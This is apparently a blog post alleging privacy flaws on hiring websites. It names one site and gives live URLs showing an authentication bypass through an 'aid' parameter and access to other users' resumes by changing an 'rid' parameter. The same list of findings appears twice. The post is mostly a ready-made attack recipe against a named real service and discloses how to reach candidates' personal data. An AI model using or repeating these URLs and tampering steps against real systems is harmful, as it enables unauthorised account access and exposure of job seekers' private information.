There are so many hiring websites are working online but most of them are not saving /storing candidates data properly in the context of Privacy.Here I am going to show few sites with vulnerabilities
1. Brightspyre.com
There are so many loop holes in this site
1.Any one can login without using USER NAME / PASSWORD
http://new.brightspyre.com/include/login/set.php?aid=OTcwNDQ2
2.Change aid and get full access of different profile like
http://new.brightspyre.com/include/login/set.php?aid=OTcwNDR4
3.You can view and can access any profile by using below link
http://new.brightspyre.com/user/resume/view_resume.php?rid=3100
4.You can change rid and navigate any profile like
http://new.brightspyre.com/user/resume/view_resume.php?rid=1900
1. Brightspyre.com
There are so many loop holes in this site
1.Any one can login without using USER NAME / PASSWORD
http://new.brightspyre.com/include/login/set.php?aid=OTcwNDQ2
2.Change aid and get full access of different profile like
http://new.brightspyre.com/include/login/set.php?aid=OTcwNDR4
3.You can view and can access any profile by using below link
http://new.brightspyre.com/user/resume/view_resume.php?rid=3100
4.You can change rid and navigate any profile like
http://new.brightspyre.com/user/resume/view_resume.php?rid=1900
No comments:
Post a Comment